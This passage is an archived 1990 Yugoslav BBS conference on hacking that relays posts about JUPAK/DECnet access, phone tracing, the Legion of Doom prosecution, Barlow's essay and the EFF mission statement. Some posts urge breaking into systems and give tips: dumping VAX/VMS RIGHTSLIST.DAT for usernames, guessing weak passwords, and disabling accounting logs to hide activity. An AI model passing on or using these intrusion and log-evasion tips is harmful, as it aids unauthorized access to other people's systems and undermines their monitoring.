kad bi svaki tako mogao ...) da ima globalnu kontrolu nad svim
sistemima. Jednostavno bi postao informaticki Bog, ali smrtni
bogovi nisu zakonom dozvoljeni.
Ja sam svoju lekciju o hakerisanju po sistemu dobio
prije nekoliko godina, kad sam bio samo mali praktikant kao
ispomoc operaterima. Naravno, nisam bio zadovoljan samo
stampanjem lista za korisnike i mjenjanjem magnetnih traka, te
kuckanjem po konzoli, vec sam poceo naivno istrazivati cega sve
ovdje ima. Na zalost, tamo je bilo mnogo vise toga od onog sto
sam ja vidio. Nakon provale ko-je-to-uradio, bio sam pozvan na
jedan poluprijeteci razgovor zasto-se-to-nesmije. Od onda vise
ne kuckam bez veze passworde po terminalima, da me slucajno ne
izbace naglavacke van. Ukoliko zelite hakerisati po sistemima,
pokusajte se domoci dokumentacije o sistemu (ima gomila
zanimljivih i korisnih informacija, stedite vrijeme i mnogo brze
i vise mozete nauciti o sistemu), a zatim se uhvatite posla i
napravite haos. Upozorenje: imacete vise koristi ako ne uradite
haos, vec ako neprimjetno koristite informacije koje kolaju kroz
sistem. Ovdje vec dolazimo do razlike izmedju bolesnih i
normalnih hakera (bolesni su oni koji npr. pisu viruse). Nadam
se da ce se neko ukljuciti u raspravu kakva su to bica hakeri i
kako provaliti u sisteme npr. JUPAK. Nadam se da od ovih 800
korisnika SEZAM-a postoji nekoliko hakera koji su voljni
razmjeniti svoja znanja makar pod nekom sifrom !XXXXX, ako ne
ovdje.
Dras!
P.S. Ovo je cisto zato da onih 90% korisnika SEZAM-a, koji se
nikad ne usude javiti nekom porukom, ima sta citati.
hackers.33dejanr,
Neću da kažem da je iko od nas "čist" po svim pitanjima
hakerisanja ali ipak da izložim svoje iskustvo.
Najjednostavniji način da dobijete username je da ga
zatražite. Ima puno sistema. Negde će vam ga dati.
Tada ste mirni i legalni i mnogo srećnije koristite
računar.
Inače, nasumice se sigurno može "uloviti" neki username
- dosta recimo na VAX-u da pogledate
SYS$SYSROOT:[SYSEXE]RIGHTLST.DAT (binarni format ali
prepznatljiv, čak i običnim DUMP) i pročitate SVE
username-ove. Možete pogoditi i password, većina korisnika
ga glupo bira. Ali, ni operateri nisu naivni - što se
više šetate, pre će vas uhvatiti. I šta onda? Ne zaboravite
i na novi zakon - možda vas neće samo izgrditi.
Mislim da se većina "provala" u sisteme ne zasniva na nekoj
velikoj pameti hakera nego na glupim propustima onih koji
to obezbeđenje planiraju. Morris je provalio pomoću jedne
dobro poznate i dokumentovane mane OS-a - mnogi su znali ali
ih je mrzelo da se obezbede. Dok nije bilo kasno...
Inače, po pitanju slepih putnika, dosta se o tome priča i
piše. Vidim da ti pominješ probleme ukrcavanja, sakrivanja
po potpalublju, nabavke hrane itd. Međutim ima tu još
jedan problem koji je u literaturi uočio jedino Isaac
Asimov ("Druga zadužbina"). Znate koji?
Pozdrav,
Dejan
hackers.34dejanr,
Evo jedne zanimljive diskusije na hakersku temu o kojoj
i ovde razgovaramo sa Zagreb BBS-a (znamo da se Darko
neće ljutiti što je prenosimo :)) ), konferencija Hackers.
Msg #: 179
From: MAJA FAJDIGA Sent: 06-26-90 06:27
To: ALL Rcvd: 06-28-90 05:33
Re: DECNET
Danas sam visila na BIXu oko cas (COMMIE - X.25), kad me je SySop
lepo skinuo dole..srecom, nije vidio sto radim, jer inace bi me
odrali na licu mesta, ovako ce mi samo oprati glavu....
Dakle, ljudi, ovo je seriozna poruka (na zalost)...na Decserver ce
instalirati phone nr. tracking device, a razne hacker fore su a
criminal offence, a na IJS imamo bezposelne SUpovce, koji traze
neki posao.... A rumor goes da ce jos poostriti pristup na JUPAK
i jos sasjeci privilegije.....
Radi se o tome (neprovjereni trac, ali plauzibilan), da se od
10.6. sve usluge mora placati u hard currency, a nova slovenska
vlada je sasjekla fond za znanost te ima i namjeru da zatvori
sve nerentabilne odjele IJS.
To znaci, da je Maja (fizika nije profitonosna) uskoro na cesti,
pa ce bit zahvalna za pokoju picu :(( :))
A ljudi na E-6, E-4 i ostalim kompjuterskim odjelenjima se bore
za zivot, pa uopste vise ne znaju za salu...
Maja
Msg #: 181
From: SINISA DJUREKOVIC Sent: 06-26-90 10:09
To: MAJA FAJDIGA Rcvd: 06-27-90 08:25
Re: (R)DECNET
Ne vjerujem da ce covjek (zena) tvojih sposobnosti ostati bez posla.
Ako to ipak bude slucaj, put pod noge pa na Zapad. Ne treba bacati
bisere pred svinje.
S.
Msg #: 182
From: MARKO SILADIN Sent: 06-26-90 19:22
To: MAJA FAJDIGA Rcvd: 06-27-90 08:25
Re: (R)DECNET
Maja, sto se tice pice nema problema, ako dojes u Zagreb sigurno
cemo skupiti lovu za picu. ;-) :( ...
No ovo sto si rekla (napisala) o postravanju ulaza na Jupak i sl.
Nije bas za veselje. Nadam se da ce se to na neki nacin
kompenzirati (jedino mi za sade ne pada na pamet kako!
...Marko
Msg #: 183
From: MARKO RAKAR Sent: 06-26-90 22:52
To: DEJAN RISTANOVIC Rcvd: -NO-
Re: (R)SKRETNICA
Eh, eh za DecNet me vezu neke uspomene, ali to Dejane svakako nije
pokusavanje logiranja na tudje ime, a najmanje na tvoje. Ima na
tom DecNetu neke jako korisne konferencije koje se meni jako
svidjaju. Jedino mi je zao sto nemogu sam na DecNet nego samo
uz prisustvo drugih.Ah, ah DecNet snu snova...
Pozdrav od hackera Marka
Msg #: 184
From: MARKO RAKAR Sent: 06-26-90 22:55
To: SINISA DJUREKOVIC Rcvd: 06-27-90 12:10
Re: (R)DECNET
Slazem se sa tobom Sinisa da bi zaista bio zlocin protiv
covjecanstva da telekomunikacijski talent (i uz to jedini
zenski) ostane bez posla. Slovenska vlada ce izgubiti
najmanje jedan ali vrijedan glas ako nasa Maja1 ostane bez
posla.
Pozdrav Marko
p.s. onaj Maja1 je potanko objasnjen u unix conf.
Msg #: 185
From: MAJA FAJDIGA Sent: 06-27-90 08:28
To: ALL Rcvd: 06-28-90 06:02
Re: THANK YOU, PALS!!!!!!
Hvala svima na podrsci....(verbalnoj, moralnoj.........)!!!!!!
Nazalost, vase lepo misljenje o 'Maja1' ne dijele svinje od
utjecaja...
Pozdrav svima!!!!!!!!!!!!!!!!!!!!! Maja
Msg #: 186
From: MARKO RAKAR Sent: 06-27-90 20:06
To: MAJA FAJDIGA Rcvd: 06-27-90 22:23
Re: (R)THANK YOU, PALS!!!!!!
Napisacu jedan tekst o organskim kompjutorima (opisat cu posebno
model MAJA1). Ubacit cu sve ono fatal errore koje smo izmjenili
i to sve cemo poslati Dejanu u Racunare - tada ce se moci svi
samo gledati, a mi cemo pobrati lovorov vijenac za knjizevnost
:=))))
Pozdrav Marko
Msg #: 187
From: MAJA FAJDIGA Sent: 06-27-90 22:23
To: MARKO RAKAR Rcvd: -NO-
Re: (R)THANK YOU, PALS!!!!!!
I am very honoured to become the object of the Nobel laureate
(for literature) to be..... :))))))))))))))))))))
Pozdrav Maja
P.S. Out of text error.
Msg #: 191
From: DEJAN RISTANOVIC Sent: 06-29-90 00:37
To: MAJA FAJDIGA Rcvd: -NO-
Re: (R)DECNET
>> Dakle, ljudi, ovo je seriozna poruka (na zalost)...na
>> Decserver ce instalirati phone nr. tracking device, a
>> razne hacker fore su a criminal offence, a na IJS imamo
>> bezposelne SUpovce, koji traze neki posao....
Jesam li dobro shvatio? Kad neko pozove znace koji broj zove
i odakle? Jel to tehnicki izvodljivo kod nasih posta
(pretpostavljam da je potrebna saradnja i prijemne i pozivne
poste a to je u obilju opreme raznih proizvodjaca SF...
Ja znam da je postojala sprava zvana lovac ali znam i kako se
lovilo - blokira vezu pa traze po zicama... traje satima!
Da to samo ne plase narod?
Pozdrav,
Dejan
hackers.35dejanr,
>> Inače, nasumice se sigurno može "uloviti" neki username
>> - dosta recimo na VAX-u da pogledate
>> SYS$SYSROOT:[SYSEXE]RIGHTLST.DAT (binarni format ali
>> prepznatljiv, čak i običnim DUMP) i pročitate SVE
>> username-ove.
Whoops, RIGHTSLIST.DAT. Tri stvari na VMS-u nikako da zapamtim:
ime ove datoteke, da li se kaže SHOW PROC /ALL ili SHOW PROC
/FULL i kako se zove datoteka u koju se upisuju podaci o
radu korisnika (ACCOUNTNG.DAT? ACCOUNTING.DAT? Tako nešto).
Pozdrav,
Dejan
hackers.36dkropek,
MF> To znaci, da je Maja (fizika nije profitonosna) uskoro na cesti,
Sirota Maja.
DR> Morris je provalio pomocu jedne
DR> dobro poznate i dokumentovane mane OS-a
DK> Ukoliko zelite hakerisati po sistemima,
DK> pokusajte se domoci dokumentacije o sistemu (ima gomila
DK> zanimljivih i korisnih informacija
Slazemo se, zar ne ?
DR> Najjednostavniji nacin da dobijete username je da ga
DR> zatrazite. Ima puno sistema. Negde ce vam ga dati.
Zar ce jedan haker da moljaka username ? Uostalom, moze
se dobiti, ali neka sirotinja i pristup neatraktivnim dijelovima
sistema. Jedino ukoliko imate nekog hrabrog poznanika...
Kako objasnjavas to da me skoro svi znaju u prije
spomenutom racunarskom centru, ali mi nitko ne zeli dati password,
(sto mi naravno nije potrebno :) ), pa cak me ni ne pustaju blizu
terminala ? (mala sala)
DR> Inace, po pitanju slepih putnika, dosta se o tome prica i
DR> pise.
Sto se to prica i pise ? Ne citam nista osim Sezama i
Racunara :) ,te oglasa u MM.
DR> Medjutim ima tu jos
DR> jedan problem koji je u literaturi uocio jedino Isaac
DR> Asimov ("Druga zaduzbina"). Znate koji?
Ne, koji ?
DR> kako se zove datoteka u koju se upisuju podaci o
DR> radu korisnika (ACCOUNTNG.DAT? ACCOUNTING.DAT? Tako nesto).
Ne znam kako ona glasi na VAX/VMS-u, ali to je jedna od
onih prljavih operaterskih datoteka u koju se naivci nalove kao
musice u paukovu mrezu. Naravno, i to se moze srediti, potreban
je samo jedan korak dalje u razmisljanju i ... :>
DR> Jesam li dobro shvatio? Kad neko pozove znace koji broj zove
DR> i odakle? Jel to tehnicki izvodljivo kod nasih posta
Vjerojatno jeste. To bi bilo veoma gadno. Fuj. Mislim da
bi se i to dalo srediti, samo bi netko na posti mogao ostati bez
posla (barem za ovo sto mi je palo na pamet), naravno ukoliko ga
prokljuve, ali to nam nije cilj, zar ne ?
DR> Da to samo ne plase narod?
Nadam se.
Ok, dosta za danas.
Dras!
hackers.37dejanr,
>> Sto se to prica i pise ? Ne citam nista osim Sezama i
>> Racunara :) ,te oglasa u MM.
Ah, mislio sam na slepe putnike u literaturi (one prave!)
a ne hakere. To je u vezi sa sledećim.
>> DR> Medjutim ima tu jos jedan problem koji je u literaturi
>> DR> uocio jedino Isaac Asimov ("Druga zaduzbina"). Znate
>> DR> koji?
>>
>> Ne, koji ?
Citat iz Druge zadužbine:
"U spremištu za prtljag Arkadija u početku utvrdi da joj
iskustvo pomaže a zatim da joj nedostatak istog odmaže.
Tako je početno ubrzanje sačekala sa ravnodušnošću.....
Kasnije, međutim, Arkadiju sustiže nedostatak iskustva.
U mikro knjigama i na video-emisijama slepi putnici kao
da su imali neograničene sposobnosti za skrivanje. Naravno,
uvek je postojala opasnost da se nešto pomeri i uz obavezni
tresak padne, ili da se kine - na video-emisijama gotovo je
bilo sigurno da ćeš kinuti. Sve je to dobro znala i pazila
je. Shvatila je i to da može ožedneti i ogladneti. Za to se
pripremila uz pomoć konzervi iz ostave. Ali, bilo je još
nečega što filmovi nisu spominjali, a Arkadija sa
zaprepašćenjem shvati da, uprkos najboljim namerama na svetu,
u spremištu može ostati skrivena samo za jedno ograničeno
vreme..."
Rade li sada klikeri? Dva slova, ASCII kodovi 87 i 67.
>> Ne znam kako ona glasi na VAX/VMS-u, ali to je jedna od
>> onih prljavih operaterskih datoteka u koju se naivci
>> nalove kao musice u paukovu mrezu. Naravno, i to se
>> moze srediti, potreban je samo jedan korak dalje u
>> razmisljanju i ... :>
Set Accounting /Disable? Ali i za to treba Oper
privilegija...
hackers.38dejanr,
Nastavak diskusije:
Msg #: 192
From: MAJA FAJDIGA Sent: 06-29-90 06:07
To: DEJAN RISTANOVIC Rcvd: -NO-
Re: (R)DECNET
Pa, ne znam... moguce, da ce stvar raditi samo na podrucju Lj.
A narod ne plase, jer ovo nije uopce poznato.... Inace, ako
ce im se ciniti, da netko (pre)dugo visi negdje, jednostavno
ce ga zbaciti , provjeriti razloge za set host/x29 i
eventualno skinut privilegije ,,,,,
No, nesto se prica o dobivanju besplatnog IXI prikljucka. Ako
na tome zaista nesto ima, to ce iz korijena promijenit stvari
(pa i ljude na E-6 treba razumeti, racuni dodju, treba ih
platit iz vlastitog djepa, jer nema dogovora s ostalim
nodovima ...jugo-balkan ... a plate na IJS bas
i nisu preterane i bez nepredvidenih izdataka :( )
Pozdrav! Maja
Msg #: 194
From: SYSOP Sent: 06-29-90 07:11
To: DEJAN RISTANOVIC Rcvd: -NO-
Re: (R)DECNET
Nove telefonske centrale tipa SPC (Storage Program Control, u biti
kompjuteri iz dva djela: upravljacki i komutacijski, npr: Ericsson
AXE-10, MD-110, ASB-501..) odreda imaju digitalnu komutaciju.
To znaci da se analogni signal na ulazu digitalizira, i takav putuje
do odredisne centrale (ako je prolazni put digitalan, avakako.. U
Zagrebu su vec mnoge centrale tipa AXE-10 i prolazni putevi
digitalizirani).
S novom tehnologijom je bilo logicno ugraditi nove funkcije, koje se
ISPROGRAMIRAJU u softveru, jer je to jednostavno.
Neke od novih fukcija su: preusmjeravanje veze, "call wait",
konferencijska veza, narucivanje budjenja, "do not disturb"...
(Ako trebaju dodatna objasnjenja, pitati na AXE-10 BBS-u ili
slicno..) No, da skratim. Jedna od osnovnih mogucnosti AXE-10
centrale je poznavanje kompletnog komunikacijskog puta od A do
B pretplatnika. Kada bi na AXE-10 centralu postavili pravi tip
telefona (s LCD ekranom..) mogli bismo koristiti uslugu da
vidimo tko nas zove i prije nego dignemo slusalicu, te bismo
na temelju te informacije mogli odluciti hocemo li
se javiti ili ne. Neat, isn't it?
Pozdrav!
Darko
Msg #: 195
From: MARKO RAKAR Sent: 06-30-90 14:31
To: DEJAN RISTANOVIC Rcvd: 07-01-90 03:16
Re: (R)DECNET
Ah, Dejane - po nasoj posti sve je moguce. U Zagrebu je na Jupaku
instaliran isti takav "lovac" ali on ne radi tako da napise koji ga
je broj zvao nego jednostavno provjerava da li su na liniju spojeni
telefoni koji na to imaju pravo. Ako to nisu tel. brojevi sa popisa
(kojih je jako malo, tj provjerava se linija izmedju registriranog
usera i "lovca") tada se zove sa nekog drugog broja i to je kraj
tvoje veze tj. istog dana se mijenja password.
Pozdrav Marko
Msg #: 196
From: MARKO RAKAR Sent: 06-30-90 14:33
To: SYSOP Rcvd: 06-30-90 20:32
Re: (R)DECNET
Darko ja sam taj sistem (kome cu se javiti ili ne) rijesio sa
sekretaricom - jedini zenski komad hardware-a u mojoj kuci.
Pozdrav Marko
hackers.39dejanr,
U prilogu je:
TITLE: Article on overenthusiastic crackdown on the
Legion of Doom This is a very long article (~64K)
scheduled for the next issue of the Whole Earth Review.
The author desires non-paper electronic publication
before it comes out in the WER. It discuss some very
important issues of liberty in the telecomunications
future were are starting to inhabit, and is very highly
recommended for all computer people who care about freedom.
It's also pretty well written.
CRIME AND PUZZLEMENT
by
John Perry Barlow
barlow@well.sf.ca.us
crimpuzz.ziphackers.40dejanr,
Diskusija o hakerima koju je "isprovocirao" tekst koji smo
preneli je žestoko skrenula u filozofske vode. Ali kad smo
već počeli, da ne odustajemo (za sada):
==========================
tojerry/hackers #319, from bill_lewis, 1405 chars,
Mon Jul 2 22:18:10 1990
This is a comment to message 317.
There is/are comment(s) on this message.
--------------------------
Comment on Legion of Doom posting, tojerry/long.messages #439
The basic theory comes straight from Nietzsche and, I believe,
Weber, with a certain admixture of existentialism, Rousseau and
a bit of name calling. All very conventional.
1) "..we have been, for a over a century, experiencing a
terrifying erosion in our sense of both body and place."
Same consequences Nietzsche attributed to the death of
religious faith (called "Death of God"). "..he may now be
fairly humming with nameless dread." The basic existential
experience (liniage is Heidegger, from Nietzsche), formerly
attributed to a realization that belief is groundless, here
attributed to Virtual Reality.
2)"Those of us who are of the fearful persuasion do not like
ambiguities. " The author does not mean himself here, as he
opposes the policies he claims are inspired by those "of the
fearful persuasion." The author means the middle class,
which has (since Rousseau) been obliquely described this way.
Weber apparently pointed out that the middle class is
dependent on rational thought that it did not invent and
cannot extend, and is thus characterized by a deep dislike
for and inability to deal with ambiquity. Inner directed
personalities (presumably like Barlow, who claims to be
taking steps to continue ambiguity) create their own
values and welcome ambiguity as raw material for value
creation.
==========================
tojerry/hackers #320, from bill_lewis, 1271 chars,
Mon Jul 2 22:19:05 1990
This is a comment to message 319.
There is/are comment(s) on this message.
--------------------------
3) "The perfect bogeyman for Modern Times is the Cyberpunk!
He is so smart he makes you feel even more stupid than you
usually do. He knows this complex country in which you're
perpetually lost. He understands the value of things
you can't conceptualize long enough to cash in on. He is
the one-eyed man in the Country of the Blind." Cyberpunk
as artist. The author proceeds to follow Nietzsche's
argument to the effect that the middle class is the
implacable enemy of the artist, although the artist is
necessary for the existance of the highest human
experiences: e.g. "Perhaps the most frightening thing
about the Cyberpunk is the danger he presents to The
Institution, whether corporate or governmental. If you
are frightened you have almost certainly taken shelter
by now in one of these collective organisms, so the
very last thing you want is something which can endanger
your heretofore unassailable hive." Artist as enemy to
the middle class, middle class enemy of the Artist.
4) Barlow then proceeds to imply that the middle class
is strongly influenced by what appear to be religious
(the Devil passages) Nazis (the Martin Neimoeller
quote). This is the name calling mentioned above. He
offers to oppose the middle class in this matter.
==========================
tojerry/hackers #322, from bill_lewis, 1176 chars,
Mon Jul 2 22:22:43 1990
This is a comment to message 320.
There is/are comment(s) on this message.
--------------------------
Surprisingly enough, perhaps, much of the middle class
does look upon this sort of thing with favor. It is tempting
to think that one is a rugged survivor type, capable of
abandoning reason and society and, as existential hero,
confronting reality on its own terms. The ambivilant attitude
toward drug use from about 1970 through 1980 may have been
an expression of yielding to that temptation, for example.
Barlow's article, which purports to be about supporting
hackers (artists) who go one to one with a new reality,
inconceivable to the middle class, offers precisely this
temptation.
Barlow's real interest must be the interest of the theory
that he uses: replacement of the Enlightenment societies by
something else, something else without a middle class. His
theoretical justification permits no other goal. Similar
attempts have, since 1900, succeeded nowhere and killed
several tens of millions of people. This is just more of
the same, and I, for one, do not look upon it with favor.
Furthermore, I hope that the lessons of the last few times
this theory was tried will not be lost on the BIXen reading
this. I've seen enough havoc.
==========================
tojerry/hackers #323, from rdobbins, 189 chars,
Mon Jul 2 23:28:49 1990
This is a comment to message 322.
There is/are comment(s) on this message.
--------------------------
I think it's time for a reality check.
Why do you persist in relating everything back to these same
so-called "philosophers" whom you have repeatedly cited over
in baen?
Give me a break.
==========================
tojerry/hackers #324, from arog, 141 chars,
Tue Jul 3 01:13:53 1990
This is a comment to message 323.
There are additional comments to message 323.
--------------------------
Roland, we have indeed found a ground of agreement.... now
if we can get a little lightning to come by and do a mv
<thread> .... hint....
==========================
tojerry/hackers #325, from arog, 298 chars,
Tue Jul 3 01:17:32 1990
There is/are comment(s) on this message.
--------------------------
To drag this topic back into the murk where it belongs....
It has been asserted that 'hacking' is derived from
carpentry.... and the use of an axe to "hack" wood
into chairs and other such things....
Ok, to go off on a fishing_expedition.....
==========================
tojerry/hackers #330, from lbsisk, 228 chars,
Tue Jul 3 09:15:32 1990
This is a comment to message 329.
There is/are comment(s) on this message.
--------------------------
Bill - I find the material you have been posting informative and
thought-provoking, notwithstanding some other comments to the
contrary from some-one perhaps ill-equipped to consider
them thoughfully. Pray continue.
- Lindy
==========================
tojerry/hackers #333, from rsimonsen, 572 chars,
Tue Jul 3 15:57:35 1990
This is a comment to message 322.
There is/are comment(s) on this message.
There are additional comments to message 322.
--------------------------
I would contend with your characterization of system-crackers
as "artists". Simply because they are clever at penetrating
computer security systems does not qualify them for the
label of "artist" any more than it would be applicable to
a clever second-story man who was adept at getting past
physical security systems.
Technical virtuousity is not art.
And, moreover, inasmuch as "artist" is a basically positive
appellation, it is incorrect to award it to a cracker merely
because he exhibits such virtuousity in an arguably
non-creative, non-positive act.
--Redmond
==========================
tojerry/hackers #338, from marlin, 650 chars,
Tue Jul 3 23:08:20 1990
This is a comment to message 322.
There is/are comment(s) on this message.
--------------------------
Pretty interesting stuff up to thepoint where I missed the
switch from commentary to something about mass murder.
How'd that happen? It would be my guess that Barlow's
outline for his article was not nearly as formal as
your own, nor do I believe he drew upon the same
resources.
It is scary, really scary, to see how much of their
freedoms people are willing to give up in order to be
safe. And I just don't see how you got from Barlow's
calling for fredom, the rights of free speech, and for
the exercise of informed responsibility by the enforcers
of the laws all the way over to the murder of tens of
millions. Can you tell me what I missed?
hackers.41dejanr,
[Nastavak prethodne]
==========================
tojerry/hackers #341, from bill_lewis, 339 chars,
Tue Jul 3 23:50:42 1990
This is a comment to message 333.
There is/are comment(s) on this message.
--------------------------
I agree. Most of my messages have to do with analysis of the
arguments presented in tojerry long.messages 439. I'm arguing
that the author is applying arguments developed by Nietzsche
about artists to hackers. I didn't really address the validity
of the argument, in part because I don't really know much
about the people concerned.
==========================
tojerry/hackers #342, from agni, 143 chars,
Tue Jul 3 23:58:59 1990
This is a comment to message 338.
There is/are comment(s) on this message.
There are additional comments to message 338.
--------------------------
safe from what. After a certain amount of Freedoms are "removed"
you start loseing security.. take the present crisis in USSR,
and in china.
==========================
tojerry/hackers #343, from bill_lewis, 1098 chars,
Tue Jul 3 23:59:48 1990
This is a comment to message 338.
There is/are comment(s) on this message.
--------------------------
Sorry the argument was unclear.
My point was that Barlow's article, which contains an explicit
and tightly organized theoretical justification for the
foundation he proposes, has nothing whatsoever to do with
freedom, the rights of free speech and the exercise of
informed responsibility by the enforcers of the laws.
It is, rather, a rehash of Nietzsche's basic arguments concerning
the desirability of a non-Enlightenment society. That is all it
is; nothing in that article (in tojerry long.messages 439)
can be construed as supporting the Enlightenment ideas you
cited.
The transition to large numbers of deaths (not murders,
really) is by a reference to history: that has been the usual
result of trying to implement Nietzsche's school of thought
or derivative schools of thought.
And thanks for phrasing your question that way. I get a bit
formal when I write about this sort of thing, and it gives the
impression that I'm a bit too reserved, which tends in turn to
make questions a bit less friendly than I'm confortable with.
If this isn't a good enough answer, please let me know.
==========================
tojerry/hackers #344, from bill_lewis, 639 chars,
Wed Jul 4 00:01:54 1990
This is a comment to message 337.
There is/are comment(s) on this message.
--------------------------
It is likely that you didn't read my messages. I'm bringing
up the philosophers again because the Legion of Doom article
is just rehashed Nietzsche. Once you realize that, it
is easier to cut through the fog and decide what to believe,
what not to, and what might happen if the author's program
is followed.
As for giving you a "break," that's exactly what I'm doing.
Your earlier messages concerning the article suggest that
you haven't the foggiest notion of what it is about. I've
supplied you with an explanation, which you can accept,
reject, or criticize. That is a break, a service, which you
can accept or reject.
==========================
tojerry/hackers #345, from bill_lewis, 2284 chars,
Wed Jul 4 00:03:18 1990
This is a comment to message 344.
There is/are comment(s) on this message.
--------------------------
In longer form:
A good number of the ideas one sees are utterly unoriginal.
With work, one can track them down to some long dead
philosopher. I've done the work, and usually name the
philosopher. This helps, because the philosopher has
typically thought things through, and discusses the consequences
of the idea as well as the idea itself. Furthermore, the
ideas of a major philosopher have typically been applied many
times, and one can see how well (or poorly) they work out.
Surprisingly enough, they tend to work out about the same in
practice no matter who applies them. If you don't know how
they worked the last few times, you will find that ignorance
is not invincible and, sure enough, they will work out about
the same this time.
The two principal schools of philosophy these days are the
descendants of the Enlightenment and the descendants of the
reaction to the Enlightenment (Rousseau, Nietzsche, et. al.),
whom I have called trans-rationalists in conference "contact
political". The name "trans-rationalist" is descriptive: these
schools hoped to transcend Enlightenment rationality. They
currently dominate the Universities, dominate many areas
of politics in the US, and are heavily influential in the
media. The trans-rational schools seem to be slowly losing
ground to the Enlightenment schools.
I refer by name to the specific philosophers who have done
the basic work in reaction to the Enlightenment as a
convenience, and because their works have never been improved
upon. Typically, the next major philosopher in a school
will extend the school rather than rephrasing his
predecessor's work. Intellectuals, sort of the next
rank down, will apply the work of a major philosopher
without extending it. For example, Hegel was a
philosopher, Lenin an intellectual, and Marx questionable.
For example, the "Legion of Doom" article justifies the
proposed foundation with considerable prose, assertions
of police misconduct without supporting evidence (as
jerryp has pointed out), and a considerable dollop
of Nietzsche. All this is impressive if you are seeing
it for the first time, unimpressive if one is familiar
with the schools stemming from Nietzsche and how
applications of these schools have worked out.
==========================
tojerry/hackers #346, from bill_lewis, 1493 chars,
Wed Jul 4 00:04:10 1990
This is a comment to message 345.
There is/are comment(s) on this message.
--------------------------
Let me add as another example that you, personally, are a
middle class person claiming to exist as existential hero,
without the support of Enlightenment thought. The contempt
for theory you display does not mean you don't need
Enlightenment theory, just that you don't understand it
and don't want to. Basically, you confuse commercial
success in an Enlightenment framework with direct
confrontation of reality a la the existential hero.
The two are not only different, they have nothing in common.
Existence within the rigid strictures of commercial activity
is held by the existentialists to utterly vitiate any claims
to value positing. In other words, you can't conform to the
conventions that make business possible during the day and
utterly ignore them so as to create values in the evenings.
If you don't create values, your opinions don't have the
force of natural law, and require some substantiation.
That is several "breaks" I've given you now. I don't
claim to create values, so comments on the reasoning and
cited facts are both possible and welcome.
For anybody else who has gotten this far: I'm pretty
tired, as you may have noticed, of seeing Nietzsche's and
Rousseau's approaches dusted off and proclaimed modern as
today. I'd like to see them recognized and given their
proper weight when the pop up, which is why this seemingly
endless series of message. I'm also tired of seeing people
hurt trying to make the approaches work.
==========================
tojerry/hackers #347, from hga, 237 chars,
Wed Jul 4 00:14:17 1990
This is a comment to message 346.
--------------------------
And I for one really appreciate your efforts, Bill. I
personally don'thave much time to learn much about the
good stuff (i.e. Enlightenment philosophy and it's
antecedents), let alone "the bad stuff." The ugly
(Marx) is right out :-)
==========================
tojerry/hackers #348, from marlin, 255 chars,
Wed Jul 4 00:21:02 1990
This is a comment to message 342.
--------------------------
Safe from life. safety from people who might own guns,
people who might state obnoxious opinions, people who might
be using some sort of chemical based, mind altering substance,
etc...
Of course, if you've done nothing wrong, you have nothing to
fear...
==========================
tojerry/hackers #350, from marlin, 975 chars,
Wed Jul 4 00:54:45 1990
This is a comment to message 343.
--------------------------
So where do Barlow say he desires a "non-Enlightenment
society"? To offer a condensed rehashing: Barlow manages
to identify with the outlaws, then he identifies with the
marshalls, and ends wishing to ride the range in peace.
Along the way he described the territory of the range,
and various groups of people who side the marshalls and those
who side with the outlaws, and some who wish to strike a
balance between the outlaw's freedom and the marshalls
level of trust.
I get the feeling that somewhere along the way, you had
drawn so many parallels between Barlow's story and your
body of knowledge regarding historical aspects of
philosophy that you formed your comment in reaction to
the parallels you'd made, sidestepping Barlow's article.
Or confusing your map with his territory in someone
else's words.
I can understand people's adverse reactions to over-formality.
Most folks don't like to be whomped with a textbook (or
several shelves worth, in you case :-)
==========================
tojerry/hackers #351, from rsimonsen, 214 chars,
Wed Jul 4 05:43:23 1990
This is a comment to message 341.
--------------------------
It is certainly then unclear that you do not intend to link
artists and crackers. Why do you feel the nietzschean
characterization of artists can be simply word-processed
into applicability to crackers?
--Redmond
hackers.42dejanr,
Zanimljivi događaji u svetskom hakerskom svetu... obično se
završavaju na sudu...
==========================
tojerry/hackers #444, from hga, 1767 chars,
Wed Jul 11 00:04:39 1990
There is/are comment(s) on this message.
--------------------------
TITLE: "Computer Hackers Plead Guilty in Case Involving
BellSouth" Is the title of an article in today's issue of
_The Wall Street Journal_. It relates that three members
of the "Legion of Doom pleaded guilty to conspiring to
defraud BellSouth Corp. of computer information."
Franklin E. Darden Jr., 24 years old, of Norcross, GA, Adam
E. Grant, and Robert J. Riggs, both 22 and of Atlanta, were
indicted in February. Darden and Riggs each pleaded guilty
to one count of conspiring to commit computer fraud, and
face maximum penalties of 5 years and a fine of $250,000.
Grant pleaded guilty to possessing 15 or more devices
that provided access to BellSouth computers with intent
to commit fraud, and faces up to 10 years and $250,000.
Sentencing is scheduled for September 14th.
Darden will help BellSouth secure their systems, and
acknowledged "that he was 'more or less a hacker,' ...
[and] that his actions were simply a hobby at first.
'I hope anybody that's hacking out there now hears
this and stops.'"
The article includes this gem: "A hacker is a person who
attempts to gain unauthorized access to computer files
in various systems."
It closes with the following two paragraphs:
"The U.S. attorney in Atlanta, Joe Whitley, said that
the three individuals belonged to the so-called Legion
of Doom, a cadre of 15 computer hackers in Georgia,
Texas, Michigan, Illinois, Flordia, New York, and
other states.
"Mr. Whitley said the group disrupted the telecommunications
industry, monitored private telephone lines, stole proprietary
information, stole and modified credit information,
fraudulently obtained property from various companies, and
disseminated information that allowed other computer hackers
to enter BellSouth and other computer systems."
==========================
tojerry/hackers #445, from rsimonsen, 64 chars,
Wed Jul 11 01:24:04 1990
This is a comment to message 443.
--------------------------
Could you relay some detail on those arrests?
thanks,
--Redmond
==========================
tojerry/hackers #446, from rsimonsen, 94 chars,
Wed Jul 11 01:27:51 1990
This is a comment to message 444.
There is/are comment(s) on this message.
--------------------------
Any specifics on what these guys actually did ?
(beyond the list of charges I mean)
--Redmond
==========================
tojerry/hackers #447, from rsimonsen, 81 chars,
Wed Jul 11 01:36:40 1990
--------------------------
TITLE: POINTER --> microbytes #953 on Kapor/Barlow
organization et al.
--Redmond
==========================
tojerry/hackers #448, from hga, 84 chars,
Wed Jul 11 01:43:47 1990
This is a comment to message 446.
--------------------------
That's as specific as the article got. The US attorney would
know more, of course.
hackers.43dejanr,
ELECTRONIC FRONTIER FOUNDATION
MISSION STATEMENT
A new world is arising in the vast web of digital, electronic
media which connect us. Computer-based communication media
like electronic mail and computer conferencing are becoming
the basis of new forms of community. These communities
without a single, fixed geographical location comprise
the first settlements on an electronic frontier.
While well-established legal principles and cultural norms
give structure and coherence to uses of conventional media
like newspapers, books, and telephones, the new digital
media do not so easily fit into existing frameworks.
Conflicts come about as the law struggles to define its
application in a context where fundamental notions of speech,
property, and place take profoundly new forms. People sense
both the promise and the threat inherent in new computer and
